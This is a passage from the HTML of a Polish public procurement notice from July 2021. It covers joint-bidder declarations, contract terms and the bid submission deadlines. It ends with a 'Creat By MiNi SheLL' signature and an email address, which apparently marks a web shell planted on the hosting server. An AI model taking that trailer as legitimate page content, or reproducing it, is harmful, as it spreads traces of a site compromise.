warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty oświadczenie,<br/>zktórego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>wykonawcy.- Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościachtych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których tezdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do<br/>ofertyoświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi<br/>wykonająposzczególni wykonawcy.- wykonawca/każdy spośród wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.W takim przypadku oświadczenie potwierdza brak<br/>podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie,<br/>w jakim każdy z wykonawców wykazuje spełnianie warunków udział w postępowaniu; <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-26 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://jgora.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-26 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-24</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-16 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com